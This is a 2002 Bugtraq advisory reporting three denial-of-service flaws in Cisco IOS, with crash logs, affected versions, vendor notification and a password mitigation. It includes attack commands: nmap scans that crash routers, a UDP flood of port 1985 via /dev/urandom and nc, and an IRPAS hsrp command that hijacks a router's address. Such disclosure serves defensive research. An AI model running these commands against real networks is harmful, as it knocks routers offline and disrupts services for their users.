Three possible DoS attacks against some IOS versions.

From: Andrew Vladimirov (andrew@arhont.com)
Date: 06/05/02


Date: 5 Jun 2002 17:52:15 -0000
From: Andrew Vladimirov <andrew@arhont.com>
To: bugtraq@securityfocus.com


('binary' encoding is not supported, stored as-is)

There are three possible unreported DoS conditions in certain versions of
IOS I could get my hands on.

1. When scanning all 65535 ports from a single host using nmap (full
connect/half connect/null/fin/ack/xmas) through a Cisco 2611 running
C2600-IO3-M, Version 12.1(6.5)the router crashes. Same applies to
scanning a class C network for a single open port. This was discovered
while auditing a corporate network.

Enableing or disableing: CBAC, IDS, IP Accounting and applied extended
ACL's with logging, does not effect the results ie. the problem persists.
 
Here comes the log :

OS (tm) C2600 Software (C2600-IO3-M), Version 12.1(6.5), MAINTENANCE
INTERIM SOFTWARE Copyright (c) 1986-2001 by cisco Systems, Inc.

Compiled Mon 29-Jan-01 19:20 by kellythw

hippo#ping cisco.com
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 198.133.219.25, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 168/170/173 ms

          < < < < < scan starts > > > > >

-Process= "IP Input", ipl= 0,
pid= 24 > -Traceback= 802CFCE4 802D19DC 807915D8 80791E04 80792598 8078B37C
803645E8 80363694 80363874 803639D0 802F0864
000010: 00:27:00: %SYS-2-MALLOCFAIL: Memory allocation of 5004 bytes
failed from 0x802CCB60, pool Processor, alignment 0
-Process= "IP Input", ipl= 0, pid= 24
-Traceback= 802CFCE4 802D2230 802CCB64 802CD350 80791488 807915F4 80791E04
80792598 8078B37C 803645E8 80363694 80363874 803639D0 802F0864
000011: 00:27:30: %SYS-2-MALLOCFAIL: Memory allocation of 5004 bytes
failed from 0x802CCB60, pool Processor, alignment 0
-Process= "IP Input", ipl= 0, pid= 24
-Traceback= 802CFCE4 802D2230 802CCB64 802CD350 80791488 807915F4 80791E04
80792598 8078B37C 803645E8 80363694 80363874 803639D0 802F0864
000012: 00:28:00: %SYS-2-MALLOCFAIL: Memory allocation of 5004 bytes
failed from 0x802CCB60, pool Processor, alignment 0
-Process= "IP Input", ipl= 0, pid= 24
-Traceback= 802CFCE4 802D2230 802CCB64 802CD350 80791488 807915F4 80791E04
80792598 8078B37C 803645E8 80363694 80363874 803639D0 802F0864

hippo#sh stacks 24

Process 24: IP Input
Stack segment 0x80DB0DB4 - 0x80DB3C94
FP: 0x80DB3C68, RA: 0x802DE6D8
FP: 0x80DB3C88, RA: 0x80363998
FP: 0x0, RA: 0x802F0864
    
hippo#sh run
hippo#

(no response)
  
root@boar:~# ping cisco.com
ping: unknown host cisco.com

The router does not respond. Connection is lost. CPU utilisation reaches
90 - 100 %. This bug is different from Cisco Bug ID CSCds07326i, here the
scan is going through the router and is not directed at it.

2. In certain versions of IOS UDP port 1985 is open when HSRP is not
running.

For example:

nmap -sU -vvv -O -p1985 192.168.1.254

Starting nmap V. 2.54BETA34 ( www.insecure.org/nmap/ )
Host (192.168.1.254) appears to be up ... good.
Initiating UDP Scan against (192.168.1.254)
The UDP Scan took 0 seconds to scan 1 ports.
Adding open port 1985/udp
Warning: OS detection will be MUCH less reliable because we did not find
at least 1 open and 1 closed TCP port.
Interesting ports on (192.168.1.254):
Port State Service
1985/udp open unknown
Remote OS guesses: Cisco IOS 11.1(7)-11.2(8.10), Cisco 4500-M running IOS
11.3(6) IP Plus, Cisco IOS 11.3 - 12.0(11), Cisco 1600/3640/7513 Router
(IOS 11.2(14)P), Cisco IOS v11.14(CA)/12.0.2aT1/v12.0.3T

However, a) tcpdump did not show any hsrp packets on the network
         b) attempts to communicate with the router via HSRP using IRPAS
         (http://www.phenoelit.de/irpas/), successful when HSRP is
         running, failed to illicit any response.

Flooding 1985 with randomly sized UDP packets (cat /dev/urandom pipe via
nc as UDP etc.,) leads to CPU utilisation above 90% and eventually the
router crashes. Besides the presence of this open port, where it should be
shut, assists in remote OS fingerprinting.
 
I have checked this with a number of system administrators I know; here
are the stats for udp port 1985 on their routers I've collected:
 
Open 1985: 12.1(8a)E5 Catalyst 6k R700, 11.2(23) C2500-I-L, 12.2(2)XI
(c827), 12.1(9) (C2500-I-L), 11.1(16) (c1000), 12.0(4)XM (c805), 12.2(2)T1
(C2600-IK8O3S);

Closed 1985: 12.0(3)T (C2500-I-L), 12.0(9) (c1600), 11.3(8)T1 (c2600),
12.0(3)T (c1720), 12.2(3) (c1720), 12.0(16) (C2500-I-L), 12.0(5)XQ
(C1700-NY-M);

In general, 12.0.x does not appear to have this potential problem.
Out of the routers checked, 50 % had udp 1985 open. All routers with
1985 open were succeptible to DoS via 1985 UDP flood. None had HSRP
enabled and running.

 
3. While using IRPAS to test the "bug" above I have found the following.
The 12.1.x IOS implementation of HSRP fails to check the IP address of the
phantom router against the IP address of the interface on which HSRP is
running when the IP is advertised from the remote host using IRPAS. This
results in a conflict over the IP address for the interface, bypassing
normal sanity checks.

An obvious DoS condition is created, since the phantom router can be
remotely given an IP address of a local interface through which packets
enter the Active router, thus leading to a loop.

Example :

./hsrp -d 192.168.1.253 -v 192.168.1.254 -a cisco -g 1 -i eth0
where 192.168.1.253 - IP of a phantom router, 192.168.1.254 - IP of an
active router interface on which the standby 1 ip 192.168.1.253 command is
configured.

000059: 00:10:34: %STANDBY-6-STATECHANGE: Standby: 1: Ethernet0/1 state
Active -> Speak

000060: 00:10:34: %STANDBY-3-DIFFVIP1: Ethernet0/1 Group 1 active routers
virtual IP address 192.168.1.254 is different to the locally configured
address 192.168.1.253

May 6 18:28:26 192.168.1.254 324: 000317: 2d17h: %STANDBY-3-DUPADDR:
Duplicate address 192.168.1.254 on Ethernet0/1, sourced by 0050.043a.ff60

Nevretheless, the router goes into standby and 192.168.1.254 is taken as a
phantom's IP.

Interestingly, ./hsrp -d 192.168.1.253 -v 192.168.1.254 -a cisco -g 1 -i
eth0 -S 192.168.1.254 does not appear to have any effect and the packets
are dropped.

Setting a good password while enabling HSRP (something that should be done
anyway !) provides a temporary solution for this problem. Unfortunately, I
have seen networks running HSRP with default password "cisco".

Vendor status: PSIRT was informed on 07.05.02

Asknowledgements to: the Arhont team, Phenoelit team/Fyodor for tools,
the rest of the open source community.

      Andrew A. Vladimirov
          aka _clf3_
          Arhont LTD
         www.arhont.com
        Security Manager
          CCNP / CCDP



Relevant Pages

  • Re: Using Remote Desktop From an SBS Domain
    ... when you tried to RDP while attached directly to a port on your router? ... So if 3389 needs forwarded on the client end too then that is what the ... Hopefully next week I can attempt a connection while my ISP watches the ...
    (microsoft.public.windows.server.sbs)
  • Re: Cost of setting up a network
    ... A router capable of acting as a VPN endpoint for more than one user simultaneously with four Ethernet ports or a switch to suit. ... The rationale for using a server here is basically that the router doesn't need to be able to decide which PC to route the connection to. ... If you are using a router which supports it, you can set up a port-forwarding inbound rule which also _translates_ the port supplied to the receiving port. ... You can use several of these connections to different machines simultaneously. ...
    (uk.comp.homebuilt)
  • How did they get behind my NAT?
    ... this point I panicked and shutdown the VNC service ASAP. ... My question is how the attacker got to my VNC port! ... the internet through the router. ... client connection using local port number 5900 (which was also being ...
    (alt.computer.security)
  • Re: Connecting to Home Computer
    ... cannot transmit IP packets outside the local network). ... assigned by your router. ... You have to add the port too, ... Determine the ports (pcAnywhere uses 5631 for DATA, 5632 for STATUS, I ...
    (microsoft.public.windowsxp.work_remotely)
  • RE: [Full-Disclosure] Microsoft urging users to buy Harware Firewalls
    ... connections between multiple computers. ... A Linksys NAT router box is selling for only $40 at Amazon ... Besides protecting against the MSBlaster worm, a hardware ... Then the user finds about port forwarding, and as soon as the user ...
    (Full-Disclosure)